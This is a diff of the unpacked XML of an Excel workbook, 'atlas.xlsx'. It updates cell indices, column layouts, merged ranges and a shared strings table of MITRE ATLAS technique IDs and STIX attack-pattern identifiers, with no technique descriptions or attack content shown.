       <c r="G22" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
     </row>
     <row r="23" spans="1:7">
       <c r="A23" t="s">
-        <v>628</v>
+        <v>688</v>
       </c>
       <c r="B23" t="s">
-        <v>654</v>
+        <v>714</v>
       </c>
       <c r="C23" t="s">
-        <v>680</v>
+        <v>740</v>
       </c>
       <c r="D23" t="s">
-        <v>706</v>
+        <v>766</v>
       </c>
       <c r="E23" s="2" t="s">
-        <v>732</v>
+        <v>792</v>
       </c>
       <c r="F23" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G23" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
     </row>
     <row r="24" spans="1:7">
       <c r="A24" t="s">
-        <v>629</v>
+        <v>689</v>
       </c>
       <c r="B24" t="s">
-        <v>655</v>
+        <v>715</v>
       </c>
       <c r="C24" t="s">
-        <v>681</v>
+        <v>741</v>
       </c>
       <c r="D24" t="s">
-        <v>707</v>
+        <v>767</v>
       </c>
       <c r="E24" s="2" t="s">
-        <v>733</v>
+        <v>793</v>
       </c>
       <c r="F24" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G24" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
     </row>
     <row r="25" spans="1:7">
       <c r="A25" t="s">
-        <v>630</v>
+        <v>690</v>
       </c>
       <c r="B25" t="s">
-        <v>656</v>
+        <v>716</v>
       </c>
       <c r="C25" t="s">
-        <v>682</v>
+        <v>742</v>
       </c>
       <c r="D25" t="s">
-        <v>708</v>
+        <v>768</v>
       </c>
       <c r="E25" s="2" t="s">
-        <v>734</v>
+        <v>794</v>
       </c>
       <c r="F25" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G25" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
     </row>
     <row r="26" spans="1:7">
       <c r="A26" t="s">
-        <v>631</v>
+        <v>691</v>
       </c>
       <c r="B26" t="s">
-        <v>657</v>
+        <v>717</v>
       </c>
       <c r="C26" t="s">
-        <v>683</v>
+        <v>743</v>
       </c>
       <c r="D26" t="s">
-        <v>709</v>
+        <v>769</v>
       </c>
       <c r="E26" s="2" t="s">
-        <v>735</v>
+        <v>795</v>
       </c>
       <c r="F26" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G26" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
     </row>
     <row r="27" spans="1:7">
       <c r="A27" t="s">
-        <v>632</v>
+        <v>692</v>
       </c>
       <c r="B27" t="s">
-        <v>658</v>
+        <v>718</v>
       </c>
       <c r="C27" t="s">
-        <v>684</v>
+        <v>744</v>
       </c>
       <c r="D27" t="s">
-        <v>710</v>
+        <v>770</v>
       </c>
       <c r="E27" s="2" t="s">
-        <v>736</v>
+        <v>796</v>
       </c>
       <c r="F27" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G27" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
     </row>
   </sheetData>
@@ -7214,7 +7716,7 @@
 
 <file path=xl/worksheets/sheet4.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:X15"/>
+  <dimension ref="A1:Y16"/>
   <sheetViews>
     <sheetView workbookViewId="0"/>
   </sheetViews>
@@ -7240,483 +7742,525 @@
     <col min="18" max="18" width="20.7109375" customWidth="1"/>
     <col min="19" max="19" width="20.7109375" style="3" customWidth="1"/>
     <col min="20" max="20" width="20.7109375" style="4" customWidth="1"/>
-    <col min="21" max="21" width="20.7109375" style="3" customWidth="1"/>
-    <col min="22" max="22" width="20.7109375" style="4" customWidth="1"/>
-    <col min="23" max="23" width="20.7109375" style="3" customWidth="1"/>
-    <col min="24" max="24" width="20.7109375" style="4" customWidth="1"/>
-    <col min="25" max="25" width="20.7109375" customWidth="1"/>
+    <col min="21" max="21" width="20.7109375" customWidth="1"/>
+    <col min="22" max="22" width="20.7109375" style="3" customWidth="1"/>
+    <col min="23" max="23" width="20.7109375" style="4" customWidth="1"/>
+    <col min="24" max="24" width="20.7109375" style="3" customWidth="1"/>
+    <col min="25" max="25" width="20.7109375" style="4" customWidth="1"/>
+    <col min="26" max="26" width="20.7109375" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:24">
+    <row r="1" spans="1:25">
       <c r="A1" s="5" t="s">
-        <v>532</v>
+        <v>590</v>
       </c>
       <c r="B1" s="5"/>
       <c r="C1" s="5" t="s">
-        <v>531</v>
+        <v>586</v>
       </c>
       <c r="D1" s="5"/>
       <c r="E1" s="5" t="s">
-        <v>538</v>
+        <v>589</v>
       </c>
       <c r="F1" s="5"/>
       <c r="G1" s="1" t="s">
-        <v>530</v>
+        <v>588</v>
       </c>
       <c r="H1" s="5" t="s">
-        <v>536</v>
+        <v>594</v>
       </c>
       <c r="I1" s="5"/>
       <c r="J1" s="5" t="s">
-        <v>545</v>
+        <v>599</v>
       </c>
       <c r="K1" s="5"/>
       <c r="L1" s="1" t="s">
-        <v>577</v>
+        <v>635</v>
       </c>
       <c r="M1" s="5" t="s">
-        <v>535</v>
+        <v>592</v>
       </c>
       <c r="N1" s="5"/>
       <c r="O1" s="1" t="s">
-        <v>547</v>
+        <v>603</v>
       </c>
       <c r="P1" s="5" t="s">
-        <v>540</v>
+        <v>593</v>
       </c>
       <c r="Q1" s="5"/>
       <c r="R1" s="1" t="s">
-        <v>539</v>
+        <v>585</v>
       </c>
       <c r="S1" s="5" t="s">
-        <v>534</v>
+        <v>591</v>
       </c>
       <c r="T1" s="5"/>
-      <c r="U1" s="5" t="s">
-        <v>542</v>
-      </c>
-      <c r="V1" s="5"/>
-      <c r="W1" s="5" t="s">
-        <v>537</v>
-      </c>
-      <c r="X1" s="5"/>
-    </row>
-    <row r="2" spans="1:24">
+      <c r="U1" s="1" t="s">
+        <v>602</v>
+      </c>
+      <c r="V1" s="5" t="s">
+        <v>596</v>
+      </c>
+      <c r="W1" s="5"/>
+      <c r="X1" s="5" t="s">
+        <v>587</v>
+      </c>
+      <c r="Y1" s="5"/>
+    </row>
+    <row r="2" spans="1:25">
       <c r="A2" s="3" t="s">
-        <v>220</v>
+        <v>248</v>
       </c>
       <c r="C2" s="6" t="s">
-        <v>218</v>
+        <v>246</v>
       </c>
       <c r="D2" s="4" t="s">
-        <v>228</v>
-      </c>
-      <c r="E2" s="3" t="s">
-        <v>249</v>
+        <v>240</v>
+      </c>
+      <c r="E2" s="6" t="s">
+        <v>244</v>
+      </c>
+      <c r="F2" s="4" t="s">
+        <v>243</v>
       </c>
       <c r="G2" t="s">
-        <v>217</v>
+        <v>242</v>
       </c>
       <c r="H2" s="3" t="s">
-        <v>227</v>
-      </c>
-      <c r="J2" s="6" t="s">
-        <v>223</v>
-      </c>
-      <c r="K2" s="4" t="s">
-        <v>264</v>
+        <v>255</v>
+      </c>
+      <c r="J2" s="3" t="s">
+        <v>306</v>
       </c>
       <c r="L2" t="s">
-        <v>269</v>
+        <v>301</v>
       </c>
       <c r="M2" s="3" t="s">
-        <v>249</v>
+        <v>258</v>
       </c>
       <c r="O2" t="s">
-        <v>314</v>
+        <v>347</v>
       </c>
       <c r="P2" s="3" t="s">
+        <v>254</v>
+      </c>
+      <c r="R2" t="s">
         <v>239</v>
       </c>
-      <c r="Q2" s="4" t="s">
+      <c r="S2" s="6" t="s">
         <v>260</v>
       </c>
-      <c r="R2" t="s">
-        <v>233</v>
-      </c>
-      <c r="S2" s="6" t="s">
-        <v>223</v>
-      </c>
       <c r="T2" s="4" t="s">
-        <v>264</v>
-      </c>
-      <c r="U2" s="3" t="s">
-        <v>250</v>
-      </c>
-      <c r="W2" s="3" t="s">
-        <v>229</v>
-      </c>
-    </row>
-    <row r="3" spans="1:24">
+        <v>251</v>
+      </c>
+      <c r="U2" t="s">
+        <v>329</v>
+      </c>
+      <c r="V2" s="6" t="s">
+        <v>282</v>
+      </c>
+      <c r="W2" s="4" t="s">
+        <v>286</v>
+      </c>
+      <c r="X2" s="3" t="s">
+        <v>259</v>
+      </c>
+    </row>
+    <row r="3" spans="1:25">
       <c r="A3" s="3" t="s">
-        <v>259</v>
+        <v>291</v>
       </c>
       <c r="C3" s="6"/>
       <c r="D3" s="4" t="s">
-        <v>277</v>
-      </c>
-      <c r="E3" s="3" t="s">
-        <v>252</v>
+        <v>256</v>
+      </c>
+      <c r="E3" s="6"/>
+      <c r="F3" s="4" t="s">
+        <v>262</v>
       </c>
       <c r="G3" t="s">
-        <v>258</v>
+        <v>245</v>
       </c>
       <c r="H3" s="3" t="s">
-        <v>270</v>
-      </c>
-      <c r="J3" s="6"/>
+        <v>302</v>
+      </c>
+      <c r="J3" s="6" t="s">
+        <v>310</v>
+      </c>
       <c r="K3" s="4" t="s">
-        <v>290</v>
+        <v>315</v>
       </c>
       <c r="L3" t="s">
-        <v>270</v>
+        <v>302</v>
       </c>
       <c r="M3" s="3" t="s">
-        <v>256</v>
-      </c>
-      <c r="N3" s="4" t="s">
-        <v>226</v>
-      </c>
-      <c r="P3" s="6" t="s">
-        <v>240</v>
-      </c>
-      <c r="Q3" s="4" t="s">
-        <v>245</v>
+        <v>281</v>
+      </c>
+      <c r="P3" s="3" t="s">
+        <v>269</v>
       </c>
       <c r="R3" t="s">
-        <v>234</v>
+        <v>263</v>
       </c>
       <c r="S3" s="6"/>
       <c r="T3" s="4" t="s">
+        <v>252</v>
+      </c>
+      <c r="V3" s="6"/>
+      <c r="W3" s="4" t="s">
+        <v>296</v>
+      </c>
+      <c r="X3" s="3" t="s">
+        <v>266</v>
+      </c>
+    </row>
+    <row r="4" spans="1:25">
+      <c r="A4" s="3" t="s">
+        <v>330</v>
+      </c>
+      <c r="C4" s="6" t="s">
+        <v>247</v>
+      </c>
+      <c r="D4" s="4" t="s">
+        <v>265</v>
+      </c>
+      <c r="E4" s="6"/>
+      <c r="F4" s="4" t="s">
+        <v>293</v>
+      </c>
+      <c r="G4" t="s">
         <v>290</v>
       </c>
-      <c r="U3" s="6" t="s">
-        <v>251</v>
-      </c>
-      <c r="V3" s="4" t="s">
-        <v>255</v>
-      </c>
-      <c r="W3" s="3" t="s">
-        <v>236</v>
-      </c>
-    </row>
-    <row r="4" spans="1:24">
-      <c r="A4" s="3" t="s">
-        <v>299</v>
-      </c>
-      <c r="C4" s="6" t="s">
-        <v>219</v>
-      </c>
-      <c r="D4" s="4" t="s">
-        <v>235</v>
-      </c>
-      <c r="E4" s="6" t="s">
-        <v>280</v>
-      </c>
-      <c r="F4" s="4" t="s">
-        <v>232</v>
-      </c>
-      <c r="G4" t="s">
-        <v>281</v>
-      </c>
       <c r="H4" s="6" t="s">
-        <v>272</v>
+        <v>304</v>
       </c>
       <c r="I4" s="4" t="s">
-        <v>238</v>
-      </c>
-      <c r="J4" s="3" t="s">
-        <v>274</v>
-      </c>
-      <c r="M4" s="3" t="s">
-        <v>269</v>
-      </c>
-      <c r="P4" s="6"/>
-      <c r="Q4" s="4" t="s">
+        <v>268</v>
+      </c>
+      <c r="J4" s="6"/>
+      <c r="K4" s="4" t="s">
+        <v>320</v>
+      </c>
+      <c r="M4" s="6" t="s">
         <v>288</v>
       </c>
+      <c r="N4" s="4" t="s">
+        <v>253</v>
+      </c>
+      <c r="P4" s="3" t="s">
+        <v>270</v>
+      </c>
       <c r="R4" t="s">
-        <v>276</v>
-      </c>
-      <c r="S4" s="6" t="s">
-        <v>230</v>
-      </c>
+        <v>264</v>
+      </c>
+      <c r="S4" s="6"/>
       <c r="T4" s="4" t="s">
-        <v>224</v>
-      </c>
-      <c r="U4" s="6"/>
-      <c r="V4" s="4" t="s">
-        <v>263</v>
-      </c>
-      <c r="W4" s="3" t="s">
-        <v>246</v>
-      </c>
-      <c r="X4" s="4" t="s">
-        <v>282</v>
-      </c>
-    </row>
-    <row r="5" spans="1:24">
+        <v>297</v>
+      </c>
+      <c r="V4" s="6"/>
+      <c r="W4" s="4" t="s">
+        <v>298</v>
+      </c>
+      <c r="X4" s="3" t="s">
+        <v>278</v>
+      </c>
+    </row>
+    <row r="5" spans="1:25">
       <c r="A5" s="3" t="s">
-        <v>300</v>
+        <v>331</v>
       </c>
       <c r="C5" s="6"/>
       <c r="D5" s="4" t="s">
-        <v>285</v>
+        <v>314</v>
       </c>
       <c r="E5" s="6"/>
       <c r="F5" s="4" t="s">
-        <v>261</v>
+        <v>313</v>
       </c>
       <c r="G5" t="s">
-        <v>289</v>
+        <v>319</v>
       </c>
       <c r="H5" s="6"/>
       <c r="I5" s="4" t="s">
-        <v>262</v>
+        <v>295</v>
       </c>
       <c r="J5" s="3" t="s">
-        <v>291</v>
-      </c>
-      <c r="M5" s="3" t="s">
-        <v>273</v>
-      </c>
-      <c r="P5" s="6" t="s">
-        <v>241</v>
-      </c>
-      <c r="Q5" s="4" t="s">
-        <v>307</v>
+        <v>321</v>
+      </c>
+      <c r="M5" s="6"/>
+      <c r="N5" s="4" t="s">
+        <v>257</v>
+      </c>
+      <c r="P5" s="3" t="s">
+        <v>271</v>
       </c>
       <c r="S5" s="6"/>
       <c r="T5" s="4" t="s">
-        <v>225</v>
-      </c>
-      <c r="U5" s="6"/>
-      <c r="V5" s="4" t="s">
-        <v>266</v>
-      </c>
-      <c r="W5" s="3" t="s">
-        <v>247</v>
-      </c>
-    </row>
-    <row r="6" spans="1:24">
-      <c r="A6" s="3" t="s">
-        <v>301</v>
+        <v>311</v>
+      </c>
+      <c r="V5" s="3" t="s">
+        <v>283</v>
+      </c>
+      <c r="X5" s="3" t="s">
+        <v>279</v>
+      </c>
+      <c r="Y5" s="4" t="s">
+        <v>309</v>
+      </c>
+    </row>
+    <row r="6" spans="1:25">
+      <c r="A6" s="6" t="s">
+        <v>332</v>
+      </c>
+      <c r="B6" s="4" t="s">
+        <v>299</v>
       </c>
       <c r="C6" s="3" t="s">
-        <v>237</v>
+        <v>267</v>
       </c>
       <c r="D6" s="4" t="s">
-        <v>222</v>
-      </c>
-      <c r="E6" s="6"/>
-      <c r="F6" s="4" t="s">
-        <v>279</v>
+        <v>250</v>
+      </c>
+      <c r="E6" s="3" t="s">
+        <v>276</v>
       </c>
       <c r="H6" s="3" t="s">
-        <v>316</v>
+        <v>349</v>
       </c>
       <c r="I6" s="4" t="s">
-        <v>313</v>
+        <v>346</v>
       </c>
       <c r="J6" s="3" t="s">
-        <v>296</v>
-      </c>
-      <c r="M6" s="3" t="s">
-        <v>275</v>
-      </c>
-      <c r="P6" s="6"/>
+        <v>326</v>
+      </c>
+      <c r="M6" s="6"/>
+      <c r="N6" s="4" t="s">
+        <v>277</v>
+      </c>
+      <c r="P6" s="3" t="s">
+        <v>272</v>
+      </c>
       <c r="Q6" s="4" t="s">
-        <v>308</v>
+        <v>292</v>
       </c>
       <c r="S6" s="6"/>
       <c r="T6" s="4" t="s">
-        <v>265</v>
-      </c>
-      <c r="U6" s="3" t="s">
-        <v>254</v>
-      </c>
-      <c r="W6" s="3" t="s">
-        <v>249</v>
-      </c>
-    </row>
-    <row r="7" spans="1:24">
-      <c r="A7" s="6" t="s">
-        <v>302</v>
-      </c>
+        <v>353</v>
+      </c>
+      <c r="V6" s="3" t="s">
+        <v>287</v>
+      </c>
+      <c r="X6" s="3" t="s">
+        <v>281</v>
+      </c>
+    </row>
+    <row r="7" spans="1:25">
+      <c r="A7" s="6"/>
       <c r="B7" s="4" t="s">
-        <v>267</v>
+        <v>322</v>
       </c>
       <c r="C7" s="3" t="s">
-        <v>248</v>
-      </c>
-      <c r="E7" s="6"/>
-      <c r="F7" s="4" t="s">
-        <v>284</v>
-      </c>
-      <c r="P7" s="6"/>
+        <v>280</v>
+      </c>
+      <c r="E7" s="3" t="s">
+        <v>281</v>
+      </c>
+      <c r="M7" s="3" t="s">
+        <v>294</v>
+      </c>
+      <c r="P7" s="6" t="s">
+        <v>273</v>
+      </c>
       <c r="Q7" s="4" t="s">
-        <v>309</v>
-      </c>
-      <c r="S7" s="6"/>
+        <v>275</v>
+      </c>
+      <c r="S7" s="6" t="s">
+        <v>261</v>
+      </c>
       <c r="T7" s="4" t="s">
-        <v>283</v>
-      </c>
-      <c r="U7" s="3" t="s">
-        <v>268</v>
-      </c>
-      <c r="W7" s="6" t="s">
-        <v>253</v>
-      </c>
-      <c r="X7" s="4" t="s">
-        <v>257</v>
-      </c>
-    </row>
-    <row r="8" spans="1:24">
+        <v>344</v>
+      </c>
+      <c r="V7" s="3" t="s">
+        <v>300</v>
+      </c>
+      <c r="X7" s="6" t="s">
+        <v>285</v>
+      </c>
+      <c r="Y7" s="4" t="s">
+        <v>241</v>
+      </c>
+    </row>
+    <row r="8" spans="1:25">
       <c r="A8" s="6"/>
       <c r="B8" s="4" t="s">
-        <v>292</v>
+        <v>343</v>
       </c>
       <c r="C8" s="3" t="s">
-        <v>271</v>
+        <v>303</v>
       </c>
       <c r="E8" s="3" t="s">
-        <v>287</v>
-      </c>
-      <c r="F8" s="4" t="s">
-        <v>306</v>
-      </c>
-      <c r="P8" s="3" t="s">
-        <v>242</v>
+        <v>284</v>
+      </c>
+      <c r="M8" s="3" t="s">
+        <v>301</v>
+      </c>
+      <c r="P8" s="6"/>
+      <c r="Q8" s="4" t="s">
+        <v>318</v>
       </c>
       <c r="S8" s="6"/>
       <c r="T8" s="4" t="s">
-        <v>320</v>
-      </c>
-      <c r="W8" s="6"/>
-      <c r="X8" s="4" t="s">
-        <v>278</v>
-      </c>
-    </row>
-    <row r="9" spans="1:24">
-      <c r="A9" s="6"/>
-      <c r="B9" s="4" t="s">
-        <v>310</v>
+        <v>345</v>
+      </c>
+      <c r="V8" s="3" t="s">
+        <v>307</v>
+      </c>
+      <c r="W8" s="4" t="s">
+        <v>334</v>
+      </c>
+      <c r="X8" s="6"/>
+      <c r="Y8" s="4" t="s">
+        <v>289</v>
+      </c>
+    </row>
+    <row r="9" spans="1:25">
+      <c r="A9" s="3" t="s">
+        <v>333</v>
       </c>
       <c r="C9" s="6" t="s">
-        <v>286</v>
+        <v>316</v>
       </c>
       <c r="D9" s="4" t="s">
-        <v>221</v>
+        <v>249</v>
       </c>
       <c r="E9" s="3" t="s">
-        <v>318</v>
-      </c>
-      <c r="P9" s="3" t="s">
-        <v>243</v>
-      </c>
-      <c r="S9" s="6" t="s">
-        <v>231</v>
-      </c>
+        <v>317</v>
+      </c>
+      <c r="F9" s="4" t="s">
+        <v>338</v>
+      </c>
+      <c r="M9" s="3" t="s">
+        <v>305</v>
+      </c>
+      <c r="P9" s="6" t="s">
+        <v>274</v>
+      </c>
+      <c r="Q9" s="4" t="s">
+        <v>339</v>
+      </c>
+      <c r="S9" s="6"/>
       <c r="T9" s="4" t="s">
-        <v>311</v>
-      </c>
-      <c r="W9" s="6"/>
-      <c r="X9" s="4" t="s">
-        <v>297</v>
-      </c>
-    </row>
-    <row r="10" spans="1:24">
+        <v>348</v>
+      </c>
+      <c r="X9" s="6"/>
+      <c r="Y9" s="4" t="s">
+        <v>327</v>
+      </c>
+    </row>
+    <row r="10" spans="1:25">
       <c r="C10" s="6"/>
       <c r="D10" s="4" t="s">
-        <v>304</v>
-      </c>
-      <c r="P10" s="3" t="s">
-        <v>244</v>
-      </c>
-      <c r="S10" s="6"/>
+        <v>336</v>
+      </c>
+      <c r="E10" s="3" t="s">
+        <v>351</v>
+      </c>
+      <c r="M10" s="3" t="s">
+        <v>308</v>
+      </c>
+      <c r="P10" s="6"/>
+      <c r="Q10" s="4" t="s">
+        <v>341</v>
+      </c>
+      <c r="S10" s="6" t="s">
+        <v>310</v>
+      </c>
       <c r="T10" s="4" t="s">
+        <v>315</v>
+      </c>
+      <c r="X10" s="6"/>
+      <c r="Y10" s="4" t="s">
+        <v>335</v>
+      </c>
+    </row>
+    <row r="11" spans="1:25">
+      <c r="C11" s="3" t="s">
+        <v>321</v>
+      </c>
+      <c r="M11" s="3" t="s">
         <v>312</v>
       </c>
-      <c r="W10" s="6"/>
-      <c r="X10" s="4" t="s">
-        <v>303</v>
-      </c>
-    </row>
-    <row r="11" spans="1:24">
-      <c r="C11" s="3" t="s">
-        <v>291</v>
+      <c r="P11" s="6"/>
+      <c r="Q11" s="4" t="s">
+        <v>342</v>
       </c>
       <c r="S11" s="6"/>
       <c r="T11" s="4" t="s">
-        <v>315</v>
-      </c>
-      <c r="W11" s="6"/>
-      <c r="X11" s="4" t="s">
-        <v>317</v>
-      </c>
-    </row>
-    <row r="12" spans="1:24">
+        <v>320</v>
+      </c>
+      <c r="X11" s="6"/>
+      <c r="Y11" s="4" t="s">
+        <v>350</v>
+      </c>
+    </row>
+    <row r="12" spans="1:25">
       <c r="C12" s="3" t="s">
-        <v>293</v>
+        <v>323</v>
       </c>
       <c r="S12" s="3" t="s">
-        <v>319</v>
-      </c>
-      <c r="W12" s="3" t="s">
-        <v>305</v>
-      </c>
-    </row>
-    <row r="13" spans="1:24">
+        <v>352</v>
+      </c>
+      <c r="X12" s="3" t="s">
+        <v>337</v>
+      </c>
+    </row>
+    <row r="13" spans="1:25">
       <c r="C13" s="3" t="s">
-        <v>294</v>
-      </c>
-    </row>
-    <row r="14" spans="1:24">
+        <v>324</v>
+      </c>
+    </row>
+    <row r="14" spans="1:25">
       <c r="C14" s="3" t="s">
-        <v>295</v>
-      </c>
-    </row>
-    <row r="15" spans="1:24">
+        <v>325</v>
+      </c>
+    </row>
+    <row r="15" spans="1:25">
       <c r="C15" s="3" t="s">
-        <v>298</v>
+        <v>328</v>
+      </c>
+    </row>
+    <row r="16" spans="1:25">
+      <c r="C16" s="3" t="s">
+        <v>340</v>
       </c>
     </row>
   </sheetData>
-  <mergeCells count="24">
-    <mergeCell ref="A7:A9"/>
+  <mergeCells count="25">
+    <mergeCell ref="A6:A8"/>
     <mergeCell ref="A1:B1"/>
     <mergeCell ref="C2:C3"/>
     <mergeCell ref="C4:C5"/>
     <mergeCell ref="C9:C10"/>
     <mergeCell ref="C1:D1"/>
-    <mergeCell ref="E4:E7"/>
+    <mergeCell ref="E2:E5"/>
     <mergeCell ref="E1:F1"/>
     <mergeCell ref="H4:H5"/>
     <mergeCell ref="H1:I1"/>
-    <mergeCell ref="J2:J3"/>
+    <mergeCell ref="J3:J4"/>
     <mergeCell ref="J1:K1"/>
+    <mergeCell ref="M4:M6"/>
     <mergeCell ref="M1:N1"/>
-    <mergeCell ref="P3:P4"/>
-    <mergeCell ref="P5:P7"/>
+    <mergeCell ref="P7:P8"/>
+    <mergeCell ref="P9:P11"/>
     <mergeCell ref="P1:Q1"/>
-    <mergeCell ref="S2:S3"/>
-    <mergeCell ref="S4:S8"/>
-    <mergeCell ref="S9:S11"/>
+    <mergeCell ref="S2:S6"/>
+    <mergeCell ref="S7:S9"/>
+    <mergeCell ref="S10:S11"/>
     <mergeCell ref="S1:T1"/>
-    <mergeCell ref="U3:U5"/>
-    <mergeCell ref="U1:V1"/>
-    <mergeCell ref="W7:W11"/>
-    <mergeCell ref="W1:X1"/>
+    <mergeCell ref="V2:V4"/>
+    <mergeCell ref="V1:W1"/>
+    <mergeCell ref="X7:X11"/>
+    <mergeCell ref="X1:Y1"/>
   </mergeCells>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -17,7 +17,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1509" uniqueCount="797">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1663" uniqueCount="872">
   <si>
     <t>ID</t>
   </si>
@@ -46,6 +46,15 @@
     <t>platforms</t>
   </si>
   <si>
+    <t>AML.T0080</t>
+  </si>
+  <si>
+    <t>AML.T0053</t>
+  </si>
+  <si>
+    <t>AML.T0085.001</t>
+  </si>
+  <si>
     <t>AML.T0035</t>
   </si>
   <si>
@@ -73,6 +82,9 @@
     <t>AML.T0002</t>
   </si>
   <si>
+    <t>AML.T0084.002</t>
+  </si>
+  <si>
     <t>AML.T0006</t>
   </si>
   <si>
@@ -115,9 +127,15 @@
     <t>AML.T0005</t>
   </si>
   <si>
+    <t>AML.T0083</t>
+  </si>
+  <si>
     <t>AML.T0010.002</t>
   </si>
   <si>
+    <t>AML.T0085</t>
+  </si>
+  <si>
     <t>AML.T0036</t>
   </si>
   <si>
@@ -136,6 +154,9 @@
     <t>AML.T0051.000</t>
   </si>
   <si>
+    <t>AML.T0084</t>
+  </si>
+  <si>
     <t>AML.T0007</t>
   </si>
   <si>
@@ -163,6 +184,9 @@
     <t>AML.T0018.002</t>
   </si>
   <si>
+    <t>AML.T0084.000</t>
+  </si>
+  <si>
     <t>AML.T0031</t>
   </si>
   <si>
@@ -175,6 +199,9 @@
     <t>AML.T0015</t>
   </si>
   <si>
+    <t>AML.T0086</t>
+  </si>
+  <si>
     <t>AML.T0024</t>
   </si>
   <si>
@@ -235,9 +262,6 @@
     <t>AML.T0054</t>
   </si>
   <si>
-    <t>AML.T0053</t>
-  </si>
-  <si>
     <t>AML.T0065</t>
   </si>
   <si>
@@ -268,12 +292,18 @@
     <t>AML.T0074</t>
   </si>
   <si>
+    <t>AML.T0080.000</t>
+  </si>
+  <si>
     <t>AML.T0010.003</t>
   </si>
   <si>
     <t>AML.T0002.001</t>
   </si>
   <si>
+    <t>AML.T0081</t>
+  </si>
+  <si>
     <t>AML.T0018.001</t>
   </si>
   <si>
@@ -307,6 +337,12 @@
     <t>AML.T0058</t>
   </si>
   <si>
+    <t>AML.T0082</t>
+  </si>
+  <si>
+    <t>AML.T0085.000</t>
+  </si>
+  <si>
     <t>AML.T0070</t>
   </si>
   <si>
@@ -361,12 +397,21 @@
     <t>AML.T0000.002</t>
   </si>
   <si>
+    <t>AML.T0080.001</t>
+  </si>
+  <si>
+    <t>AML.T0084.001</t>
+  </si>
+  <si>
     <t>AML.T0005.000</t>
   </si>
   <si>
     <t>AML.T0005.001</t>
   </si>
   <si>
+    <t>AML.T0051.002</t>
+  </si>
+  <si>
     <t>AML.T0011.000</t>
   </si>
   <si>
@@ -391,349 +436,403 @@
     <t>AML.T0043.000</t>
   </si>
   <si>
-    <t>attack-pattern--c7d79f0f-1c80-41d5-b6ef-3c1c53c34a06</t>
-  </si>
-  <si>
-    <t>attack-pattern--253d4b38-c3b2-4c21-9239-9193c0500316</t>
-  </si>
-  <si>
-    <t>attack-pattern--4bd0628d-3cdd-4411-9192-2af6c0f02287</t>
-  </si>
-  <si>
-    <t>attack-pattern--fd10d38b-4428-4701-aa6b-39bcf961ac6d</t>
-  </si>
-  <si>
-    <t>attack-pattern--cdf60b67-5511-42ba-b459-3aed5c3343f2</t>
-  </si>
-  <si>
-    <t>attack-pattern--911b49e8-556c-4ca9-9dad-39040ec216db</t>
-  </si>
-  <si>
-    <t>attack-pattern--eea9d0bf-847c-4120-bcfd-dc178b4c6649</t>
-  </si>
-  <si>
-    <t>attack-pattern--056e4ffe-e0da-46ec-8dee-628a2fecacd0</t>
-  </si>
-  <si>
-    <t>attack-pattern--4eb73819-e06c-46b1-8fe0-692be6af794d</t>
-  </si>
-  <si>
-    <t>attack-pattern--c3a26e3e-3220-422c-b4b4-3913820fe6cf</t>
-  </si>
-  <si>
-    <t>attack-pattern--a1c0328f-7d6b-431f-85a9-59d0bc15786d</t>
-  </si>
-  <si>
-    <t>attack-pattern--c63cb2b7-ad6f-4790-811d-5eca14caaec8</t>
-  </si>
-  <si>
-    <t>attack-pattern--056578e2-7e26-496a-9dcd-0c1d05084da7</t>
-  </si>
-  <si>
-    <t>attack-pattern--6001061b-5b84-4d5b-af1a-5a822c214184</t>
-  </si>
-  <si>
-    <t>attack-pattern--dbe22826-20b1-4dc5-897b-fdcf89ef3ee3</t>
-  </si>
-  <si>
-    <t>attack-pattern--a9da00c7-7328-4a16-afce-04d0cd4f7290</t>
-  </si>
-  <si>
-    <t>attack-pattern--eda10125-6f7d-479f-857a-19ef5d86a961</t>
-  </si>
-  <si>
-    <t>attack-pattern--7afa4546-4cc9-4495-acb7-41b61ffb7650</t>
-  </si>
-  <si>
-    <t>attack-pattern--c1ddecc2-a64a-4cd3-a3cb-cd295b829229</t>
-  </si>
-  <si>
-    <t>attack-pattern--c5e79835-2002-4513-8de3-edaa7c3c1a3c</t>
-  </si>
-  <si>
-    <t>attack-pattern--70660fc0-a4ba-4500-ac74-557fed97b06b</t>
-  </si>
-  <si>
-    <t>attack-pattern--f95077b3-b1e0-4f4f-9baf-c0bd2f25416c</t>
-  </si>
-  <si>
-    <t>attack-pattern--248bc7a1-0df9-41fc-aeb9-e267dc0577a9</t>
-  </si>
-  <si>
-    <t>attack-pattern--ed8d9393-d6b3-4df8-8a27-c9d97f64cbf5</t>
-  </si>
-  <si>
-    <t>attack-pattern--39d12ad5-28b3-4322-953e-d17ae74159cc</t>
-  </si>
-  <si>
-    <t>attack-pattern--b432a102-8ef6-4f76-8287-7d99c4bd5e39</t>
-  </si>
-  <si>
-    <t>attack-pattern--c05491e8-0c47-490d-8df3-26f7d4fdc629</t>
-  </si>
-  <si>
-    <t>attack-pattern--1038acd6-a2d0-4fb5-93e8-e1702964182d</t>
-  </si>
-  <si>
-    <t>attack-pattern--bd5c8094-54c8-45f6-82de-4ce8349fcd4a</t>
-  </si>
-  <si>
-    <t>attack-pattern--2096e516-cb52-4131-a73d-0ef139258e4c</t>
-  </si>
-  <si>
-    <t>attack-pattern--726a5898-ac81-4c62-b828-9f105556a907</t>
-  </si>
-  <si>
